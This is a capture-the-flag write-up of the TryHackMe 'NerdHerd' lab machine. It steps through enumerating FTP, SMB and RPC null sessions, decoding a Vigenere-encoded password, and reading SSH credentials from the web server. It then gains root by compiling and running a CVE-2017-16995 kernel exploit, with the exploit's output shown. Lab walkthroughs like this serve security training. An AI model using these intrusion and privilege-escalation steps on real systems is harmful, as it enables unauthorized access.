Sep 15, 2020
Overview
My Writeup Explainning my approach Owning NerdHerd machine, Created by my friend 0xpr0N3rd, That i really had a good time solving it.
Target Informations
IP ADDRESS : 10.10.101.50
DOMAIN NAME : nerdherd.thm NERDHERD
ROOM URL : https://tryhackme.com/room/nerdherd
DESCRIPTION : Hack your way into this easy/medium level legendary TV series "Chuck" themed box!
External Enumeration
We start with a quick nmap scan to kick things off.
m3dsec@local:~/nerdherd.thm$ nmap -p- -sC -sV -oN nmap/nmap_tcp_simple 10.10.101.50
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Sep 11 04:45 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.123.226
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 0c:84:1b:36:b2:a2:e1:11:dd:6a:ef:42:7b:0d:bb:43 (RSA)
| 256 e2:5d:9e:e7:28:ea:d3:dd:d4:cc:20:86:a3:df:23:b8 (ECDSA)
|_ 256 ec:be:23:7b:a9:4c:21:85:bc:a8:db:0e:7c:39:de:49 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1337/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: Host: NERDHERD; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Well, nmap got us something :
- FTP service (21)
- SSH service (22)
- SMB server (445 - 139)
- A Web server on port (1337)
Ftp Enumeration
Trying to login into FTP anonymously, we got a .png image
m3dsec@local:~/nerdherd.thm$ ncftp 10.10.101.50
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.101.50...
(vsFTPd 3.0.3)
Logging in...
Login successful.
Logged in to 10.10.101.50.
ncftp / > ls -lt
drwxr-xr-x 3 ftp ftp 4096 Sep 11 04:45 pub
ncftp / > cd pub/
Directory successfully changed.
ncftp /pub > ls
youfoundme.png
ncftp /pub > mget youfoundme.png
youfoundme.png: 87.79 kB 127.35 kB/s
Inspecting the image, we got the owner name, which is a little bit weird tho, it doesn't sound like a name.
m3dsec@local:~/nerdherd.thm/files/ftp$ exiftool youfoundme.png |grep -i owner
Owner Name : fijbxslz
fijbxslz looks like an encoded/rotated string, that we need to decode, but for now lets just save it, it may be usefull later.
SMB Enumeration
As far as i go, SMB is one of the 1st services that i start pocking arround with.
Anonymously we can list shares, nerdherd_classified folder seems interesting, but we'll need a password to get read access, so lets keep moving
smbmap -P 445 -H 10.10.101.50 -d WORKGROUP
[+] Guest session IP: 10.10.101.50:445 Name: nerdherd.thm
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
nerdherd_classified NO ACCESS Samba on Ubuntu
IPC$ NO ACCESS IPC Service (nerdherd server (Samba, Ubuntu))
RPC Enumeration
Its always a good idea to test if the rpc system is vulnerable to null session attack.
let’s see what we can do with a null session.
m3dsec@local:~/nerdherd.thm$ rpcclient -U '' 10.10.101.50
Enter WORKGROUP\'s password:
rpcclient $> enumdomusers
user:[chuck] rid:[0x3e8]
rpcclient $> queryuser chuck
User Name : chuck
Full Name : ChuckBartowski
Home Drive : \\nerdherd\chuck
Dir Drive :
Profile Path: \\nerdherd\chuck\profile
rpcclient $> getdompwinfo
min_password_length: 5
password_properties: 0x00000000
rpcclient $> netshareenumall
netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:
netname: nerdherd_classified
remark: Samba on Ubuntu
path: C:\home\chuck\nerdherd_classified
password:
netname: IPC$
remark: IPC Service (nerdherd server (Samba, Ubuntu))
path: C:\tmp
password:
From the above, we can conclude a few things:
- The system is vulnerable to a null session attack.
- The null session allow us to enumerate users, shares, password policies.
- The most important info in this case is the username
Web Server Enumeration
Well, on this particular part, there is some rabbit holes u can fall into.
For example trying to bypass the login form on http://10.10.101.50:1337/admin/
At the end of the index page, it says Maybe the answer is in here.and its poiting to a song in youtube
After being stuck for some time, i got a pretty big hint from a good friend of mine 0xpr0N3rd aka the creator of the machine, and he says bird is the word, i was like whaat 😂
And yes, if u listen closely to the song in that video, u'll see that the the whole lyrics are bird is the word
I tried to decode the eariler retrived string with the word bird
fijbxslz -> vignere decode (bird) -> easywkuw
fijbxslz -> vignere decode (birdistheword) -> easypass
Now we have a meaningfull password, i'll assume chuck password is easypass, and i will try it against previous services.
SMB Access
The previously retrived credentials, worked over smb and now we have READ permission over nerdherd_classified folder
m3dsec@local:~/nerdherd.thm/files/ftp$ smbmap -P 445 -H 10.10.101.50 -d WORKGROUP -u chuck -p easypass
[+] IP: 10.10.101.50:445 Name: nerdherd.thm
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
nerdherd_classified READ ONLY Samba on Ubuntu
IPC$ NO ACCESS IPC Service (nerdherd server (Samba, Ubuntu))
Download the secret file from smb
m3dsec@local:~/nerdherd.thm/files/smb$ smbclient -U chuck \\\\10.10.101.50\\nerdherd_classified
Enter WORKGROUP\chuck's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Sep 11 02:29:53 2020
.. D 0 Mon Sep 14 18:41:35 2020
secr3t.txt N 125 Fri Sep 11 02:29:53 2020
8124856 blocks of size 1024. 3176792 blocks available
smb: \> mget secr3t.txt
Get file secr3t.txt? yes
getting file \secr3t.txt of size 125 as secr3t.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
m3dsec@local:~/nerdherd.thm/files/smb$ cat secr3t.txt
Ssssh! don't tell this anyone because you deserved it this far:
check out "/this1sn0tadirect0ry"
Sincerely,
0xpr0N3rd <3
0xpr0N3rd have something for us, lets see what it is
m3dsec@local:~/nerdherd.thm/files/smb$ curl 10.10.101.50:1337/this1sn0tadirect0ry/creds.txt
alright, enough with the games.
here, take my ssh creds:
chuck:th1s41ntmypa5s
Good game buddy, we know have ssh credentials.
Internal Enumeration:
With ssh, we got inside the target host as user chuck, and we noticed that:
- the path is exportable.
- user chuck is a member of sudoers group.
- we have some pre-installed commpilers.
Normally when i see compilers i go directly and check the kernel version.
huck@nerdherd:~$ uname -a
Linux nerdherd 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
In this case cve-2017-16995 looks applicable
Privelege escalation:
This time i'll be compiling the exploit on the target host, but 1st i'll transfer the exploit source code into the target host with ssh
m3dsec@local:~/nerdherd.thm$ scp /home/m3dsec/nerdherd.thm/exploit/cve-2017-16995.c chuck@10.10.101.50:/tmp/cve-2017-16995.c
chuck@10.10.101.50's password: th1s41ntmypa5s
Then compile it
chuck@nerdherd:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995 -pthread
chuck@nerdherd:/tmp$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880016009700
[*] Leaking sock struct from ffff88001a44ddc0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88001ed29240
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88001ed29240
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),1000(chuck)
# ls /root
root.txt
# sudo su
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@nerdherd:/tmp$
As our object consist of getting the flags, we can do so easly with a grep command
root@nerdherd:/# grep -rn 'THM' 2>/dev/null
Binary file sbin/zramctl matches
opt/.root.txt:3:THM{REDACTED}
Binary file lib/modules/4.4.0-31-generic/kernel/sound/pci/cs46xx/snd-cs46xx.ko matches
/home/chuch/user.txt:THM{REDACTED}
Binary file root/.bash_history matches::THM{REDACTED}
...
Conclution.
Machines with kernel exploits are rare these days, Thanks to my dude 0xpr0N3rd for such an amazing experiance.
Best Regards